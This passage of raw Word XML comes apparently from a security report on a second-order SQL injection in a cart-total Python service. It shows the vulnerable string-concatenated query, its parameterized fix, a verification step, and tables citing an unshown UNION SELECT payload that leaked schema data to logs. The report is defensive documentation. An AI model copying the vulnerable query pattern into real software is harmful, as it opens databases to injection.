              <w:t># Vulnerable: raw string concatenation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514C7DE7" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>res</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="89B4FA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cur</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E86E792" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>itemId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, price, quantity FROM inventory WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>itemId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="186ED862" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="12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item_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> +</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ";"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F6FE351" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2392D38D" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Python — Vulnerable Code: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unsafe string concatenation in get_cart_total.py allows SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CA994B" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>After — Patched Code</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F38BA8"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="89B4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2B5" w14:paraId="171E09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20" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4167C09E" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Secure: parameterized query (prepared statement)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4455363B" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>res</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="89B4FA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cur</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="140E3E31" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>itemId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, price, quantity FROM inventory WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>itemId</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CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01749F98" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F9E2AF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F9E2AF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>item_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F9E2AF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721B29C3" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76686C40" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Python — Patched Code: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Parameterized query in get_cart_total.py prevents SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0DD63A" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 8 — Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E03606" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>To verify the fix, the exact same exploitation steps were repeated. With the parameterized query deployed, the database safely treats the entire UNION SELECT payload as a literal string. Because an item with that string does not exist in the inventory, the backend gracefully handles the failure and returns a safe error without executing the payload or crashing the downstream microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648584E8" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 9 — Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71489484" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerability Rule Mapping and Behavioral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2296"/>
        <w:gridCol w:w="2026"/>
        <w:gridCol w:w="1617"/>
        <w:gridCol w:w="1943"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A222B5" w14:paraId="409730F4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="08767CCD" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="449E66DD" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Intended Rule(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0BDD1470" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B65D299" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Normal Behavior Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C4CFD1D" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploit Behavior Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A222B5" w14:paraId="1DC5274D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="033DDE4E" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Second-Order SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77860BC2" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Item IDs from internal storage must be treated as untrusted and queried safely using parameterization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C7DFEDF" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>get_cart_total.py source code, CloudWatch Logs, curl API requests.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38A7A96C" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cart calculation queries the DB and returns the numerical price of legitimate items.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="131B6A2E" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CloudWatch logs print DB schema metadata (Price: inventory) extracted via the delayed UNION SELECT payload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F817E7B" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00A222B5">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DDEF6E" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deviation Classification and Remediation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1649"/>
        <w:gridCol w:w="1293"/>
        <w:gridCol w:w="1824"/>
        <w:gridCol w:w="1659"/>
        <w:gridCol w:w="1470"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A222B5" w14:paraId="437B140C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E371205" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21BB3976" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Why This Is a Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="26983039" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="377EB1B5" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fix Applied (Where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
